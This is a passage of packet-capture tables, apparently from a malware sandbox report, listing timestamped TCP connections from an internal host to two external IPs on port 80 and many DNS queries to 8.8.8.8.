Aug 24, 2021 08:47:16.503751040 CEST	49722	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:20.300879955 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:20.301193953 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:20.321445942 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:20.452172995 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:47:20.452454090 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:47:26.340738058 CEST	80	49722	212.224.105.79	192.168.2.7
Aug 24, 2021 08:47:26.341814995 CEST	49722	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:30.822591066 CEST	49722	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:47:38.350528955 CEST	49719	80	192.168.2.7	188.34.200.103

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2021 08:45:26.576562881 CEST	61242	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:45:26.610363960 CEST	53	61242	8.8.8.8	192.168.2.7
Aug 24, 2021 08:45:45.864765882 CEST	58562	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:45:45.927755117 CEST	53	58562	8.8.8.8	192.168.2.7
Aug 24, 2021 08:45:58.673481941 CEST	56590	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:45:58.707216024 CEST	53	56590	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:20.079391956 CEST	60501	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:20.113045931 CEST	53	60501	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:24.660178900 CEST	53775	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:24.693460941 CEST	53	53775	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:25.161015987 CEST	51837	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:25.193118095 CEST	53	51837	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:25.705435991 CEST	55411	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:25.729573965 CEST	53	55411	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:25.738964081 CEST	63668	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:25.779053926 CEST	53	63668	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:26.404969931 CEST	54640	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:26.439883947 CEST	53	54640	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:26.875063896 CEST	58739	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:26.908365011 CEST	53	58739	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:28.239923000 CEST	60338	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:28.273204088 CEST	53	60338	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:29.789989948 CEST	58717	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:29.827519894 CEST	53	58717	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:30.470843077 CEST	59762	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:30.507035017 CEST	53	59762	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:30.526827097 CEST	54329	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:30.561930895 CEST	53	54329	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:30.828938961 CEST	58052	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:30.853866100 CEST	53	58052	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:31.657543898 CEST	54008	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:31.694133997 CEST	53	54008	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:32.196120024 CEST	59451	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:32.231303930 CEST	53	59451	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:39.001192093 CEST	52914	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:39.036307096 CEST	53	52914	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:42.472193003 CEST	64569	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:42.510602951 CEST	53	64569	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:54.171333075 CEST	52816	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:54.214710951 CEST	53	52816	8.8.8.8	192.168.2.7
Aug 24, 2021 08:46:56.527883053 CEST	50781	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:46:56.562426090 CEST	53	50781	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:13.481050014 CEST	54230	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:13.518866062 CEST	53	54230	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:13.534020901 CEST	54911	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:13.566236973 CEST	53	54911	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:16.165040970 CEST	49958	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:16.201859951 CEST	53	49958	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:25.212040901 CEST	59730	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:25.247690916 CEST	53	59730	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:32.404544115 CEST	59310	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:32.445775986 CEST	53	59310	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:36.951066971 CEST	51919	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:37.064794064 CEST	53	51919	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:46.389419079 CEST	64296	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:46.424907923 CEST	53	64296	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:49.095525980 CEST	56680	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:49.119937897 CEST	53	56680	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:49.150626898 CEST	58820	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:49.175241947 CEST	53	58820	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:49.202564001 CEST	60983	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:49.235085011 CEST	53	60983	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:49.264995098 CEST	49247	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:49.297125101 CEST	53	49247	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:49.390922070 CEST	52286	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:49.415807962 CEST	53	52286	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:49.466455936 CEST	56064	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:49.493520975 CEST	53	56064	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:49.508483887 CEST	63744	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:49.540524960 CEST	53	63744	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:49.556412935 CEST	61457	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:49.559547901 CEST	58367	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:49.591239929 CEST	53	61457	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:49.591520071 CEST	53	58367	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:50.158379078 CEST	60599	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:50.163214922 CEST	59571	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:50.182712078 CEST	53	60599	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:50.187608004 CEST	53	59571	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:50.232990026 CEST	52689	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:50.243258953 CEST	50290	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:50.265067101 CEST	53	52689	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:50.270613909 CEST	53	50290	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:50.388046980 CEST	60427	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:50.416435957 CEST	53	60427	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:50.970529079 CEST	56209	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:50.994828939 CEST	53	56209	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.015222073 CEST	59582	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.021343946 CEST	60949	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.021555901 CEST	58542	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.046948910 CEST	53	58542	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.047028065 CEST	53	60949	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.050235987 CEST	53	59582	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.071279049 CEST	59179	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.084142923 CEST	60927	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.095794916 CEST	53	59179	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.108587027 CEST	53	60927	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.266520023 CEST	57854	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.269180059 CEST	62026	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.292560101 CEST	53	57854	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.301549911 CEST	53	62026	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.350632906 CEST	59453	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.383733034 CEST	53	59453	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.479358912 CEST	62468	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.506721020 CEST	53	62468	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.597130060 CEST	52563	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.622622967 CEST	53	52563	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.814192057 CEST	54721	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.871423006 CEST	53	54721	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.898910999 CEST	62826	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.912298918 CEST	62046	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.937743902 CEST	53	62046	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.950653076 CEST	53	62826	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:51.965262890 CEST	51223	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:51.990842104 CEST	53	51223	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:52.159178972 CEST	63908	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:52.162072897 CEST	49226	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:52.186570883 CEST	53	49226	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:52.192112923 CEST	53	63908	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:52.682811975 CEST	60212	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:52.707314014 CEST	53	60212	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:52.893558025 CEST	58867	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:52.921178102 CEST	53	58867	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:52.991436958 CEST	50864	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:53.018769026 CEST	53	50864	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:53.409218073 CEST	61504	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:53.435579062 CEST	53	61504	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:53.513509989 CEST	60231	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:53.541570902 CEST	50095	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:53.546762943 CEST	53	60231	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:53.568717957 CEST	53	50095	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:53.693383932 CEST	59654	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:53.721900940 CEST	53	59654	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:53.903290033 CEST	58233	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:53.931272984 CEST	53	58233	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:54.108726978 CEST	56822	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:54.135993004 CEST	53	56822	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:54.157438993 CEST	62572	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:54.220375061 CEST	57179	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:54.230453014 CEST	56124	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:54.244822025 CEST	53	57179	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:54.262504101 CEST	53	56124	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:54.279831886 CEST	53	62572	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:54.554296970 CEST	62287	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:54.554332972 CEST	54644	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:54.587356091 CEST	53	54644	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:54.588921070 CEST	53	62287	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:54.638082027 CEST	59159	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:54.672688007 CEST	53	59159	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:54.731178999 CEST	57924	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:54.764632940 CEST	53	57924	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:54.908427954 CEST	51712	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:54.928452969 CEST	58865	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:54.941831112 CEST	53	51712	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:54.952848911 CEST	53	58865	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:55.117104053 CEST	64337	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:55.130242109 CEST	50407	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:55.141693115 CEST	53	64337	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:55.159260988 CEST	53	50407	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:55.213383913 CEST	61075	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:55.246578932 CEST	53	61075	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:55.318926096 CEST	54952	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:55.352417946 CEST	53	54952	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:55.445219040 CEST	59186	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:55.445497990 CEST	52280	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:55.479298115 CEST	53	52280	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:55.479330063 CEST	53	59186	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:55.653914928 CEST	51794	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:55.681969881 CEST	53	51794	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:55.717873096 CEST	50815	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:55.747142076 CEST	53	50815	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:55.865190983 CEST	58498	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:55.889533997 CEST	53	58498	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:55.986428976 CEST	56862	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:56.010759115 CEST	53	56862	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:56.074161053 CEST	61807	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:56.109137058 CEST	53	61807	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:56.119126081 CEST	52009	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:56.155805111 CEST	53	52009	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:56.185913086 CEST	58648	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:56.218522072 CEST	53	58648	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:56.278522015 CEST	59337	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:56.313728094 CEST	53	59337	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:56.467125893 CEST	59269	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:56.498244047 CEST	53	59269	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:56.634409904 CEST	49802	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:56.663858891 CEST	53	49802	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:56.928567886 CEST	50706	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:56.928611994 CEST	55153	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:57.021260977 CEST	53	55153	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:57.021271944 CEST	53	50706	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:57.302541971 CEST	59744	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:57.351638079 CEST	53	59744	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:57.445425034 CEST	59987	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:57.479355097 CEST	53	59987	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:57.537364006 CEST	61272	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:57.564635992 CEST	53	61272	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:57.896557093 CEST	54352	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:57.930521011 CEST	53	54352	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:58.001359940 CEST	60696	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:58.005964994 CEST	59139	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:58.026668072 CEST	53	60696	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:58.043481112 CEST	53	59139	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:58.048698902 CEST	59565	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:58.053445101 CEST	56397	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:58.078991890 CEST	53	56397	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:58.082046986 CEST	53	59565	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:58.262962103 CEST	52818	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:58.263437033 CEST	54236	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:58.298083067 CEST	53	52818	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:58.556293964 CEST	53	54236	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:58.602530956 CEST	54698	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:58.634541988 CEST	53	54698	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:58.838399887 CEST	58468	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:58.869709969 CEST	53	58468	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:59.409190893 CEST	58290	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:59.433381081 CEST	53	58290	8.8.8.8	192.168.2.7
Aug 24, 2021 08:47:59.657447100 CEST	54102	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:47:59.684489012 CEST	53	54102	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:00.484502077 CEST	55822	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:00.511816025 CEST	64562	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:00.512212992 CEST	61557	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:00.517615080 CEST	53	55822	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:00.537261963 CEST	53	64562	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:00.547645092 CEST	53	61557	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:00.837156057 CEST	54375	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:00.863007069 CEST	53	54375	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:01.050964117 CEST	49821	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:01.078376055 CEST	53	49821	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:02.248958111 CEST	54012	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:02.249150991 CEST	63684	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:02.249885082 CEST	62912	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:02.273992062 CEST	53	63684	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:02.275438070 CEST	53	62912	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:02.276725054 CEST	53	54012	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:02.341387987 CEST	60804	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:02.368632078 CEST	53	60804	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:02.480631113 CEST	60139	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:02.513859987 CEST	53	60139	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:02.796685934 CEST	59140	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:02.841063023 CEST	53	59140	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:02.906274080 CEST	50905	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:02.933784962 CEST	53	50905	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.014655113 CEST	53381	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.015027046 CEST	54390	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.041789055 CEST	53	54390	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.047930956 CEST	53	53381	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.102224112 CEST	63514	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.132731915 CEST	53	63514	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.166201115 CEST	50578	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.193417072 CEST	53	50578	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.254343987 CEST	63554	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.278009892 CEST	63878	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.278707981 CEST	53	63554	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.313237906 CEST	53	63878	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.383295059 CEST	53792	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.398963928 CEST	65280	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.416866064 CEST	53	53792	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.423311949 CEST	53	65280	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.470868111 CEST	55890	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.495615959 CEST	53	55890	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.520961046 CEST	57082	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.545350075 CEST	53	57082	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.751368046 CEST	64328	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.775655031 CEST	53	64328	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.866878986 CEST	54400	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.891371965 CEST	53	54400	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:03.998779058 CEST	52514	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.999362946 CEST	53104	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:03.999877930 CEST	54367	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:04.023221016 CEST	53	52514	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.024137974 CEST	53	54367	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.026463032 CEST	53	53104	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.057404041 CEST	64202	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:04.081742048 CEST	53	64202	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.147489071 CEST	62171	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:04.179713964 CEST	53	62171	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.236248970 CEST	50672	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:04.248840094 CEST	63565	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:04.273912907 CEST	53	63565	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.316931009 CEST	62121	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:04.352272034 CEST	53	62121	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.358160973 CEST	59330	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:04.369647980 CEST	53	50672	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.400027990 CEST	53	59330	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.419647932 CEST	51378	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:04.452429056 CEST	53	51378	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.730052948 CEST	58418	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:04.770129919 CEST	63211	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:04.898041964 CEST	53	58418	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.915399075 CEST	53	63211	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:04.988662004 CEST	57515	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.025302887 CEST	53	57515	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:05.041500092 CEST	56381	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.067106962 CEST	53	56381	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:05.276007891 CEST	58367	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.283545971 CEST	56096	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.309118032 CEST	53	58367	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:05.311950922 CEST	53	56096	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:05.328938961 CEST	60044	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.373893976 CEST	53	60044	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:05.383191109 CEST	61775	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.397125959 CEST	50813	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.418140888 CEST	53	61775	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:05.446487904 CEST	53	50813	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:05.515500069 CEST	65173	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.542146921 CEST	53	65173	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:05.723948002 CEST	51307	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.753479958 CEST	53	51307	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:05.853920937 CEST	51248	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.886862993 CEST	53	51248	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:05.957287073 CEST	50476	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:05.960591078 CEST	63168	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.091304064 CEST	53	50476	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:06.157926083 CEST	53	63168	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:06.196789026 CEST	62993	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.210319042 CEST	56452	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.234642029 CEST	53	56452	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:06.283145905 CEST	54547	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.308485985 CEST	53	54547	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:06.397270918 CEST	53	62993	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:06.398854017 CEST	49886	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.433669090 CEST	53	49886	8.8.8.8	192.168.2.7
